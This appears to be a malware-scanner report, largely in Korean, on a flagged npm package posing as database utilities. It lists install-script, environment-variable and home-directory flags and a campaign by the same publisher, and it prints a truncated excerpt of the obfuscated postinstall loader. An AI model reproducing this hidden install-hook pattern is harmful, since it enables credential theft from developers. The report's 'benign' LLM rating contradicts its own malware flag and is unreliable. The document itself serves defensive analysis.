// npm 패키지
@cloudplatform-single-spa/vpn
Internal database utilities with connection pooling, query builder and migration support
버전
3
메인테이너
1
라이선스
UNLICENSED
최초 publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,433 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';function a0_0x1bda(_0x311ec7,_0x284285){_0x311ec7=_0x311ec7-(0x8ad+0x24e6+-0x2bfb);const _0xe6c532=a0_0x1897();let _0x545342=_0xe6c532[_0x311ec7];if(a0_0x1bda['fARuTs']===undefined){var _…// publisher 캠페인by mr.4nd3r50n
이 계정에서 catch된 패키지 9건고립된 catch가 아닙니다. 동일 publisher가 8개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 100/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:24publisher-version-pump:25osv-flagged:MAL-2026-5003reads-env-varsreads-homedir
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';function a0_0x1bda(_0x311ec7,_0x284285){_0x311ec7=_0x311ec7-(0x8ad+0x24e6+-0x2bfb);const _0xe6c532=a0_0x1897();let _0x545342=_0xe6c532[_0x311ec7];if(a0_0x1bda['fARuTs']===undefined){var _0x7761cf=function(_0xc8f4ed){const _0x211b50='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2c1a4f='',_0x1317bb='',_0x379f1a=_0x2c1a4f+_0x7761cf,_0x20157d=(''+function(){return-0xad*0x1c+0xa*-0x1a0+0x2*0x1196;})['indexOf']('\x0a')!==-(0x1e9f+-0xb5f+-0x133f*0x1);for(let _0x51f451=-0x2*0x503+0xdf9+-0x3f3,_0x2b0802,_0x3969c8,_0x2a9e19=0x226e+0x762+-0x1*0x29d0;_0x3969c8=_0xc8f4ed['charAt'](_0x2a9e19++);~_0x3969c8&&(_0x2b0802=_0x51f451%(0x2451+0x1f5a+0x43a7*-0x1)?_0x2b0802*(-0x67*-0x2e+0x1c9e+-0x2ee0)+_0x3969c8:_0x3969c8,_0x51f451++%(-0x20b1+0x1d26*0x1+0x38f))?_0x2c1a4f+=_0x20157d||_0x379f1a['charCodeAt'](_0x2a9e19+(-0x13a3+0x1396+0x17))-(-0x26d+0x8d*-0xf+-0xaba*-0x1)!==-0x30*-0x88+-0x53*0x15+-0x3bd*0x5?String['fromCharCode'](-0x80e+0x5e7*-0x6+0x2c77&_0x2b0802>>(-(-0x245+-0x1*0x110f+0x1356)*_0x51f451&-0x2579*0x1+-0x224*0x7+0x347b)):_0x51f451:0x27*-0x4f+0x311+0x8f8){_0x3969c8=_0x211b50['indexOf'](_0x3969c8);}for(let _0x4ab2d9=-0x9e9+0x2440+-0x1*0x1a57,_0x4918bf=_0x2c1a4f['length'];_0x4ab2d9<_0x4918bf;_0x4ab2d9++){_0x1317bb+='%'+('00'+_0x2c1a4f['charCodeAt'](_0x4ab2d9)['toString'](-0xb90+-0x6*-0x29+-0xc3*-0xe))['slice'](-(0x9d*-0x2b+-0x1eb*0xd+0x3350));}return decodeURIComponent(_0x1317bb);};a0_0x1bda['JTZaWg']=_0x7761cf,a0_0x1bda['aypmgE']={},a0_0x1bda['fARu --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
